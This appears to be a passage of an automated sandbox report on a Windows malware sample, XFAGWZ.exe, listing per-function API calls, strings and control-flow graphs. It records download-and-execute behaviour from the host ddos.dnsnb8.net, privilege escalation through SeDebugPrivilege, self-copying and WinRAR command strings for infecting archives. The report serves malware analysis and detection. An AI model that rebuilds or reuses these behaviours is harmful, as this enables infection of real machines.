                            • Instruction Fuzzy Hash: 08312CF1A8031EBBDB20B765DCA5FCA37EE9F15350F040456F549A3281E6B4EAC48B60

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 172 6b1099-6b10b4 173 6b10ba-6b10c7 172->173 174 6b1199-6b119c 172->174 175 6b10c8-6b10d4 173->175 176 6b10da 175->176 177 6b1184-6b1190 175->177 178 6b1113-6b1162 call 6b185b wsprintfA * 2 URLDownloadToFileA 176->178 177->175 179 6b1196-6b1198 177->179 182 6b1168-6b1182 lstrlen Sleep 178->182 183 6b10dc-6b110d call 6b1000 WinExec lstrlen 178->183 179->174 182->177 182->178 183->178 183->179
                            APIs
                              • Part of subcall function 006B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,006B1118), ref: 006B1867
                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1878
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1880
                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1890
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1894
                            • WinExec.KERNEL32(?,00000005), ref: 006B10F1
                            • lstrlen.KERNEL32(006B4748), ref: 006B10FA
                            • wsprintfA.USER32 ref: 006B112A
                            • wsprintfA.USER32 ref: 006B1143
                            • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 006B115B
                            • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 006B1169
                            • Sleep.KERNEL32 ref: 006B1179
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                            • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$HGk$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1280626985-2131944026
                            • Opcode ID: 0b805e7c5b7e738057a4955c1f7830811e21b7974383521467c33d9109d69eff
                            • Instruction ID: 2628a7659adbf04c194a114af175c7300a4c6188e927a8efb69d93f1ef9878fb
                            • Opcode Fuzzy Hash: 0b805e7c5b7e738057a4955c1f7830811e21b7974383521467c33d9109d69eff
                            • Instruction Fuzzy Hash: 1221AEF1900218BADB20EBA0DC59BEEBBBFAB12345F510195E600A6251DB749BC4CF60

                            Control-flow Graph

                            APIs
                            • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 006B164F
                            • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 006B165B
                            • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,00000104), ref: 006B166E
                            • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 006B16AC
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006B16BD
                              • Part of subcall function 006B139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B13BC
                              • Part of subcall function 006B139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006B13DA
                              • Part of subcall function 006B139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 006B1448
                            • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B16E5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\XFAGWZ.exe$C:\Windows\system32$Documents and Settings
                            • API String ID: 123563730-300697169
                            • Opcode ID: 0c170639e7c96ff78c501b848b57b44f6135d441733e7bf9f76f645e455ca845
                            • Instruction ID: fb5cfbe55104b7917542f93a54051528e6d8f70721b5b6d148c62dc74904959d
                            • Opcode Fuzzy Hash: 0c170639e7c96ff78c501b848b57b44f6135d441733e7bf9f76f645e455ca845
                            • Instruction Fuzzy Hash: 0111AFF1640234BBCF206BA49D59EDA3F6FEF06361F501225F209992A2DA7189C0C7A5

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 205 6b1000-6b1023 CreateFileA 206 6b1092-6b1096 205->206 207 6b1025-6b1055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 6b107b-6b1085 207->208 209 6b1057-6b105f 207->209 210 6b108d-6b1091 CloseHandle 208->210 211 6b1087-6b108b CloseHandle 208->211 212 6b1061-6b106e call 6b17d0 209->212 213 6b1074-6b1075 UnmapViewOfFile 209->213 210->206 211->210 212->213 213->208
                            APIs
                            • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,HGk,http://%s:%d/%s/%s,006B10E8,?), ref: 006B1018
                            • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75BF8400), ref: 006B1029
                            • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 006B1038
                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000), ref: 006B104B
                            • UnmapViewOfFile.KERNEL32(00000000), ref: 006B1075
                            • CloseHandle.KERNEL32(?), ref: 006B108B
                            • CloseHandle.KERNEL32(00000000), ref: 006B108E
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$CloseCreateHandleView$MappingSizeUnmap
                            • String ID: HGk$ddos.dnsnb8.net$http://%s:%d/%s/%s
                            • API String ID: 1223616889-1478791336
                            • Opcode ID: 520faedab10dd059d5d125acb9d09a31c3fc674496dce2ac54972ce5be3faab2
                            • Instruction ID: 47d8c4e51314b58fd4e8ff963317ecb0fe7fda4cdb9752e338d3c634abc1320d
                            • Opcode Fuzzy Hash: 520faedab10dd059d5d125acb9d09a31c3fc674496dce2ac54972ce5be3faab2
                            • Instruction Fuzzy Hash: C90184F120425CBFE7307F609C88E6BBBAEDF44799F014629F245A6290DA705EC48B70

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 376 6b2c48-6b2c75 memset call 6b1973 379 6b2cb2-6b2cb9 376->379 380 6b2c77-6b2c7f 376->380 383 6b2cbb-6b2cc2 VirtualFree 379->383 384 6b2cc8-6b2ccc 379->384 381 6b2c8f-6b2cac CreateThread WaitForMultipleObjects 380->381 382 6b2c81-6b2c8b 380->382 381->379 382->381 383->384
                            APIs
                            • memset.MSVCRT ref: 006B2C57
                              • Part of subcall function 006B1973: PathFileExistsA.SHLWAPI(\Nk`Nk,00000000,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B1992
                              • Part of subcall function 006B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006B19BA
                              • Part of subcall function 006B1973: Sleep.KERNEL32(00000064), ref: 006B19C6
                              • Part of subcall function 006B1973: wsprintfA.USER32 ref: 006B19EC
                              • Part of subcall function 006B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006B1A00
                              • Part of subcall function 006B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006B1A1E
                              • Part of subcall function 006B1973: GetFileSize.KERNEL32(?,00000000), ref: 006B1A2C
                              • Part of subcall function 006B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 006B1A46
                              • Part of subcall function 006B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 006B1A65
                            • CreateThread.KERNEL32(00000000,00000000,006B2B8C,00000000,00000000,00000000), ref: 006B2C99
                            • WaitForMultipleObjects.KERNEL32(00000001,006B16BA,00000001,000000FF,?,006B16BA,00000000), ref: 006B2CAC
                            • VirtualFree.KERNEL32(00F80000,00000000,00008000,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,006B4E5C,006B4E60,?,006B16BA,00000000), ref: 006B2CC2
                            Strings
                            • C:\Users\user\AppData\Local\Temp\XFAGWZ.exe, xrefs: 006B2C69
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                            • String ID: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                            • API String ID: 2042498389-2837836602
                            • Opcode ID: 74ae503a5e6787f769cfcebf1f36f621a19614fee0c7310a47a064b922898559
                            • Instruction ID: a66c4c2f6a417ab5a01d257a87954c001f5bab47242c6a31bb37fd297d82371d
                            • Opcode Fuzzy Hash: 74ae503a5e6787f769cfcebf1f36f621a19614fee0c7310a47a064b922898559
                            • Instruction Fuzzy Hash: 190184F17412257AD750AB959C1AEEF7F9EEF01B50F104214B605D62C2DAA0DAC0C7E4

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 385 6b14e1-6b14fb 386 6b14fd-6b1510 GetModuleHandleA 385->386 387 6b1541-6b1547 385->387 390 6b151a-6b1535 VirtualQuery 386->390 391 6b1512-6b1518 386->391 388 6b1549-6b154c 387->388 389 6b1573-6b1574 call 6b1638 387->389 394 6b1569-6b1570 388->394 395 6b154e-6b1555 388->395 398 6b1579-6b157a ExitProcess 389->398 392 6b153b 390->392 393 6b1537-6b1539 390->393 391->387 392->387 393->387 393->392 395->394 397 6b1557-6b1566 call 6b1af9 395->397 397->394
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000), ref: 006B1504
                            • VirtualQuery.KERNEL32(006B14E1,?,0000001C), ref: 006B1525
                            • ExitProcess.KERNEL32 ref: 006B157A
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: ExitHandleModuleProcessQueryVirtual
                            • String ID:
                            • API String ID: 3946701194-0
                            • Opcode ID: 4ec20fbcbc3ba64174bc859485081bf6df917dcf843953e2ff94c633e5f4513d
                            • Instruction ID: 194cb034c1dc7aa90e288d659ce95ce3e16ebeef255a498048fcbf9a6143d949
                            • Opcode Fuzzy Hash: 4ec20fbcbc3ba64174bc859485081bf6df917dcf843953e2ff94c633e5f4513d
                            • Instruction Fuzzy Hash: 691170F2A00214EFCB20DFA5A8A56FD77BEEF85710B50622AF402DA251D63089C19B50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 401 6b1915-6b1922 402 6b1928-6b192c 401->402 403 6b1924-6b1926 401->403 405 6b194f-6b1952 402->405 406 6b192e-6b194d memset GetFileTime 402->406 404 6b196e-6b1970 403->404 405->404 408 6b1954-6b1960 SetFileTime 405->408 407 6b1966-6b1968 406->407 409 6b196a 407->409 410 6b196c 407->410 408->407 409->410 410->404
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: FileTimememset
                            • String ID:
                            • API String ID: 176422537-0
                            • Opcode ID: 6becf91a94e9d2f4e34ed19ff9646befc63bbcb3d175e47280ccb4e8f327b13b
                            • Instruction ID: 9397111696e8edcd7a4869302a7ed19848ccdf82512b93986641346f3e8d0e48
                            • Opcode Fuzzy Hash: 6becf91a94e9d2f4e34ed19ff9646befc63bbcb3d175e47280ccb4e8f327b13b
                            • Instruction Fuzzy Hash: 5DF044B2240249BBD720AE26DC14BE777AEAF51361F50853AF526D5150E730D6858BB0

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 411 6b6158-6b6189 VirtualFree 412 6b618c-6b6192 411->412 413 6b6198-6b61b0 VirtualFree 412->413 414 6b60c7-6b60cf 412->414 416 6b61ba-6b61c8 413->416 417 6b61b2-6b61b4 413->417 414->412 415 6b60d5-6b60f8 VirtualAlloc 414->415 437 6b60fa-6b60fc call 6b66c8 415->437 438 6b60fe-6b6106 415->438 419 6b61ca-6b61d7 416->419 420 6b6243-6b6251 416->420 417->416 424 6b61dd-6b61e0 419->424 422 6b6253 420->422 423 6b6264-6b626f 420->423 427 6b6255-6b6258 422->427 428 6b6271-6b6276 423->428 424->420 425 6b61e2-6b61f2 424->425 431 6b61f5-6b61fe 425->431 427->423 433 6b625a-6b6262 427->433 429 6b6389-6b63b1 VirtualProtect 428->429 430 6b627c-6b6289 428->430 436 6b63b7-6b63ba 429->436 449 6b628b 430->449 450 6b6292-6b6298 430->450 434 6b620c-6b6219 431->434 435 6b6200-6b6203 431->435 433->427 442 6b6238-6b623f 434->442 440 6b621b-6b6228 435->440 441 6b6205-6b6208 435->441 443 6b63fc-6b63ff VirtualProtect 436->443 444 6b63bc-6b63c2 436->444 437->438 446 6b6108-6b611d 438->446 447 6b6155-6b6189 VirtualFree 438->447 440->442 451 6b622a-6b6236 441->451 452 6b620a 441->452 442->431 454 6b6241 442->454 448 6b6400-6b6416 443->448 444->444 453 6b63c4 444->453 456 6b611f-6b6121 446->456 447->412 457 6b6418-6b641d 448->457 458 6b6420-6b6425 448->458 449->450 459 6b62a2-6b62ac 450->459 451->442 452->442 453->443 460 6b63c6-6b63cf 453->460 454->424 461 6b6123 456->461 462 6b6151-6b6154 456->462 464 6b62ae 459->464 465 6b62b1-6b62c8 459->465 466 6b63d1 460->466 467 6b63d4-6b63d8 460->467 461->462 463 6b6125-6b6128 461->463 462->447 468 6b612a-6b612e 463->468 469 6b6134-6b613b 463->469 464->465 470 6b62ce-6b62d4 465->470 471 6b6373-6b6384 465->471 466->467 472 6b63da 467->472 473 6b63dd-6b63e1 467->473 468->469 480 6b6130-6b6132 468->480 469->480 481 6b613d-6b614f 469->481 476 6b62da-6b62f1 470->476 477 6b62d6-6b62d9 470->477 471->428 472->473 478 6b63e3 473->478 479 6b63e7-6b63fa VirtualProtect 473->479 483 6b62f3-6b62f9 476->483 484 6b6365-6b636e 476->484 477->476 478->479 479->436 479->443 480->456 481->456 485 6b62fb-6b630f 483->485 486 6b6314-6b6326 483->486 484->459 487 6b6426-6b64a9 485->487 488 6b6328-6b634a 486->488 489 6b634c-6b6360 486->489 498 6b64ab-6b64c0 487->498 499 6b6519-6b651c 487->499 488->484 489->487 505 6b64c2 498->505 506 6b6535-6b6537 498->506 500 6b651d-6b651e 499->500 501 6b6583-6b6587 499->501 504 6b6522-6b6533 500->504 503 6b6588-6b658b 501->503 507 6b658d-6b658f 503->507 508 6b65a1-6b65a3 503->508 504->506 511 6b64f8 505->511 512 6b64c5-6b64cd 505->512 509 6b659a 506->509 510 6b6539 506->510 513 6b6591-6b6593 507->513 516 6b659b-6b659d 509->516 514 6b653b-6b6541 510->514 515 6b65b4 510->515 519 6b64fa-6b64fe 511->519 520 6b656c-6b656f 511->520 517 6b64cf-6b64d4 512->517 518 6b6542-6b6545 512->518 513->516 521 6b6595 513->521 514->518 526 6b65be-6b65db 515->526 516->513 522 6b659f 516->522 523 6b6517-6b6518 517->523 524 6b64d6-6b64d9 517->524 525 6b654d-6b6550 518->525 527 6b6572 519->527 528 6b6500 519->528 520->527 521->509 522->503 523->499 524->525 529 6b64db-6b64f5 524->529 525->526 530 6b6552-6b6556 525->530 531 6b65dd-6b65f6 526->531 532 6b6573-6b6576 527->532 528->504 533 6b6502 528->533 529->511 534 6b6578-6b657a 530->534 535 6b6558-6b6569 530->535 536 6b65f7-6b6608 531->536 532->534 533->532 537 6b6504-6b6513 533->537 534->531 538 6b657c 534->538 535->520 537->506 539 6b6515 537->539 538->536 540 6b657e-6b657f 538->540 539->523 540->501
                            APIs
                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 006B60DF
                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 006B6189
                            • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 006B61A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: Virtual$Free$Alloc
                            • String ID:
                            • API String ID: 1852963964-0
                            • Opcode ID: da173d4b8ae14c666d6a7dd247ae51d880e00d0d6d9262a4bb8f960a42960d34
                            • Instruction ID: 266abfad0f117d6e00e8423d55da8bef701a8bd66f54737b7683658fbdf2ec84
                            • Opcode Fuzzy Hash: da173d4b8ae14c666d6a7dd247ae51d880e00d0d6d9262a4bb8f960a42960d34
                            • Instruction Fuzzy Hash: 20116DB2A00659CFDF318E58CC957DD37A2EF01301F690419EE8A5B391DA792A81CB94
                            APIs
                            • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\XFAGWZ.exe,?,?,?,?,?,?,006B13EF), ref: 006B11AB
                            • OpenProcessToken.ADVAPI32(00000000,00000028,006B13EF,?,?,?,?,?,?,006B13EF), ref: 006B11BB
                            • AdjustTokenPrivileges.ADVAPI32(006B13EF,00000000,?,00000010,00000000,00000000), ref: 006B11EB
                            • CloseHandle.KERNEL32(006B13EF), ref: 006B11FA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006B13EF), ref: 006B1203
                            Strings
                            • C:\Users\user\AppData\Local\Temp\XFAGWZ.exe, xrefs: 006B11A5
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                            • String ID: C:\Users\user\AppData\Local\Temp\XFAGWZ.exe
                            • API String ID: 75692138-2837836602
                            • Opcode ID: e58f462d292a6599e87f177b8d407563bb4f81cb0c99a47f78abc10234641cb2
                            • Instruction ID: 7e2bf9636092c48e96aef5e03fc78c55dd2df9a4bee98c69dce7d560796a6c28
                            • Opcode Fuzzy Hash: e58f462d292a6599e87f177b8d407563bb4f81cb0c99a47f78abc10234641cb2
                            • Instruction Fuzzy Hash: 7501E8B5A00219FFDB00EFD4CD99AAEBBBAFF04305F504569E605A2250D7715F849B50
                            APIs
                            • strstr.MSVCRT ref: 006B23CC
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006B2464
                            • GetFileSize.KERNEL32(00000000,00000000), ref: 006B2472
                            • CloseHandle.KERNEL32(?,00000000,00000000), ref: 006B24A8
                            • memset.MSVCRT ref: 006B24B9
                            • strrchr.MSVCRT ref: 006B24C9
                            • wsprintfA.USER32 ref: 006B24DE
                            • strrchr.MSVCRT ref: 006B24ED
                            • memset.MSVCRT ref: 006B24F2
                            • memset.MSVCRT ref: 006B2505
                            • wsprintfA.USER32 ref: 006B2524
                            • Sleep.KERNEL32(000007D0), ref: 006B2535
                            • Sleep.KERNEL32(000007D0), ref: 006B255D
                            • memset.MSVCRT ref: 006B256E
                            • wsprintfA.USER32 ref: 006B2585
                            • memset.MSVCRT ref: 006B25A6
                            • wsprintfA.USER32 ref: 006B25CA
                            • Sleep.KERNEL32(000007D0), ref: 006B25D0
                            • Sleep.KERNEL32(000007D0,?,?), ref: 006B25E5
                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 006B25FC
                            • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 006B2611
                            • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 006B2642
                            • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 006B265B
                            • SetEndOfFile.KERNEL32 ref: 006B266D
                            • CloseHandle.KERNEL32(00000000), ref: 006B2676
                            • RemoveDirectoryA.KERNEL32(?), ref: 006B2681
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                            • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                            • API String ID: 2203340711-2169341206
                            • Opcode ID: 9cfb9b66db6f2fe046984032d8e679b72957284c751d426463cd8769e0aed494
                            • Instruction ID: b9896c478c2b86cd7f32f9c0a54a27077461ba8f8436ba5dff73b3688aed2d39
                            • Opcode Fuzzy Hash: 9cfb9b66db6f2fe046984032d8e679b72957284c751d426463cd8769e0aed494
                            • Instruction Fuzzy Hash: ED8180F1504355BBD710AF60DC55EEB7BEEEF88704F00061AFA44922A0E774DAC98B65
                            APIs
                            • memset.MSVCRT ref: 006B2766
                            • memset.MSVCRT ref: 006B2774
                            • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 006B2787
                            • wsprintfA.USER32 ref: 006B27AB
                              • Part of subcall function 006B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,006B1118), ref: 006B1867
                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1878
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1880
                              • Part of subcall function 006B185B: srand.MSVCRT ref: 006B1890
                              • Part of subcall function 006B185B: rand.MSVCRT ref: 006B1894
                            • wsprintfA.USER32 ref: 006B27C6
                            • CopyFileA.KERNEL32(?,006B4C80,00000000), ref: 006B27D4
                            • wsprintfA.USER32 ref: 006B27F4
                              • Part of subcall function 006B1973: PathFileExistsA.SHLWAPI(\Nk`Nk,00000000,C:\Users\user\AppData\Local\Temp\XFAGWZ.exe), ref: 006B1992
                              • Part of subcall function 006B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006B19BA
                              • Part of subcall function 006B1973: Sleep.KERNEL32(00000064), ref: 006B19C6
                              • Part of subcall function 006B1973: wsprintfA.USER32 ref: 006B19EC
                              • Part of subcall function 006B1973: CopyFileA.KERNEL32(?,?,00000000), ref: 006B1A00
                              • Part of subcall function 006B1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006B1A1E
                              • Part of subcall function 006B1973: GetFileSize.KERNEL32(?,00000000), ref: 006B1A2C
                              • Part of subcall function 006B1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 006B1A46
                              • Part of subcall function 006B1973: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 006B1A65
                            • DeleteFileA.KERNEL32(?,?,006B4E54,006B4E58), ref: 006B281A
                            • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,006B4E54,006B4E58), ref: 006B2832
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1891974235.00000000006B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 006B0000, based on PE: true
                            • Associated: 00000001.00000002.1891955036.00000000006B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1891999307.00000000006B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892015252.00000000006B4000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.1892030158.00000000006B6000.00000040.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_6b0000_XFAGWZ.jbxd
                            Similarity
                            • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                            • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                            • API String ID: 692489704-3961832207
                            • Opcode ID: 9f30953351b34c3a62056a68457166e2b4ca7daeb231ea849304b580063c921c
                            • Instruction ID: 8f4c59a48848a0aae31b7364119ee3223ebf15ab4cc34e57b137a4d336fe1a1f
                            • Opcode Fuzzy Hash: 9f30953351b34c3a62056a68457166e2b4ca7daeb231ea849304b580063c921c
                            • Instruction Fuzzy Hash: AD2187F6A4022C7BDB10EBA49C99FDB77AEEB04744F4105A1B644E2142E670DFC48B74
                            APIs
                              • Part of subcall function 006B185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,006B1118), ref: 006B1867
